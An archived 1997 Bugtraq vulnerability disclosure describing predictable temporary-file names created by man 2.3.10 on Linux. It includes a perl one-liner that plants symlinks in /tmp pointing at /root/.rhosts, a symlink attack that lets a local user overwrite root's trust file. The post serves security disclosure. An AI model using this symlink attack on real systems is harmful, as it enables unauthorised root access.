Bugtraq mailing list archives
man problem
From: tf () PYSIK TU-MUENCHEN DE (Thomas Fischbacher)
Date: Wed, 24 Dec 1997 13:25:14 +0100
Since this is my first posting to bugtraq, so please don't flame me if this is already known: I just noticed a problem with the man system (version 2.3.10) on my Linux box: /usr/man contains the .gz'd man pages: (from /usr/man/man1:) -rw-r--r-- 1 root root 1684 Sep 28 1995 cp.1.gz -rw-r--r-- 1 root root 4063 Dec 29 1995 cpio.1.gz -rw-r--r-- 1 root root 42 Oct 17 1996 cpp.1.gz When I execute man, a temporary file containing the un-zipped manpage is created in /tmp. The name of the tmp-file usually is "zman<PID>aaa", e.g. "zman10849aaa". This can be exploited with a simple symlink attack: perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}' So when root executes man here and the pid of the man process falls in the range 8000-11999... you know the rest. -- regards, (o_ Thomas Fischbacher - tf () physik tu-muenchen de //\ V_/_
Current thread:
- Crashing an XTACACS authentication server Coaxial Karma (Dec 23)
- Re: Crashing an XTACACS authentication server Alan Brown (Dec 23)
- man problem Thomas Fischbacher (Dec 24)
- Re: man problem fluffy () BENATAR DUNADAN COM (Dec 26)